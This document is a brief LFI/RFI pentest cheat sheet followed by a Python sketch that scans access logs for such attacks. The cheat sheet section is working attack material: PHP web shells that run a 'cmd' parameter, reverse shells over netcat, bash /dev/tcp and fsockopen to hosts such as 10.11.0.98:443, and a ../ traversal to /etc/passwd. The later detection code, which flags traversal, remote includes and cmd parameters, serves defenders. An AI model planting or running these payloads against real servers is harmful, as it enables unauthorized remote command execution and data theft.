LFI/RFI

Pentestmonkey's PHP reverse shell: /usr/share/webshells/php/php-reverse-shell.php

<?php echo shell_exec("nc $TARGET_IP -e /bin/sh") ?>
<?php echo system($_GET["cmd"]);?>
<?php echo shell_exec($_GET["cmd"]);?>

Reverse TCP shell without netcat

<?php echo shell_exec('/bin/bash -i >& /dev/tcp/10.11.0.98/443 0>&1');?>
<?php $sock=fsockopen("127.0.0.1",1337); exec("/bin/sh -i <&3 >&3 2>&3");?>
../../../../../../../../../etc/passwd

Notes

  • Some versions of netcat do not support the -e flag
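
The requests that deliver the snippets above leave recognizable traces in web server access logs: a chain of `../` ending in a system file, a URL passed as an include parameter, and a `cmd` query parameter. The detection sketch below is an added example, not part of the original page; the log lines, the regexes and the names `scan` and `CMD_PARAMS` are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (documentation IP ranges); not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 512
192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?page=../../../../../../../../../etc/passwd HTTP/1.1" 200 1843
192.0.2.11 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?page=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1843
192.0.2.12 - - [01/Jan/2024:10:01:00 +0000] "GET /uploads/a.php?cmd=id HTTP/1.1" 200 54
192.0.2.13 - - [01/Jan/2024:10:02:00 +0000] "GET /index.php?page=http://198.51.100.7/x.txt HTTP/1.1" 200 20
"""

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
TRAVERSAL = re.compile(r'(?:\.\.[/\\]){2,}')       # two or more ../ or ..\ steps (LFI)
REMOTE = re.compile(r'^(?:https?|ftp)://', re.I)   # URL as a parameter value (RFI)
CMD_PARAMS = {"cmd"}  # parameter name read by the one-liners on this page


def scan(log_text):
    """Return (client_ip, finding, parameter_name) for each suspicious parameter."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.search(line)
        if not m:
            continue  # not a request line we understand
        client = line.split()[0]
        query = urlsplit(m.group(1)).query
        # parse_qsl percent-decodes, so %2e%2e%2f is matched as ../
        for name, value in parse_qsl(query, keep_blank_values=True):
            if TRAVERSAL.search(value):
                hits.append((client, "traversal", name))
            if REMOTE.match(value):
                hits.append((client, "remote_url", name))
            if name.lower() in CMD_PARAMS:
                hits.append((client, "cmd_param", name))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit)
```

A 200 response to a flagged request, as in the constructed lines, is the case to triage first; GET-only logs will not show parameters sent in a POST body.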
